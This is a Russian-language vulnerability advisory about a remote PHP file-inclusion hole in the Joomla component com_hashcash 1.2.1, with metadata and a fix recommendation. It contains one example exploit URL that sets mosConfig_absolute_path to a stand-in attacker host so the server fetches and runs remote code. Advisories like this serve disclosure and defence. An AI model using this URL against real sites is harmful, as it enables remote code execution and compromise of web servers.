PHP-инклюдинг в Joomla com_hashcash

Дата публикации:
15.07.2006
Дата изменения:
24.03.2009
Всего просмотров:
3789
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
com_hashcash 1.x (компонент к Joomla)
Уязвимые версии: com_hashcash (компонент Joomla) 1.2.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_hashcash/server.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[target]/[path]/components/com_hashcash/server.php? mosConfig_absolute_path=http://attacker.com/evil.txt?

URL производителя: developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

или введите имя

CAPTCHA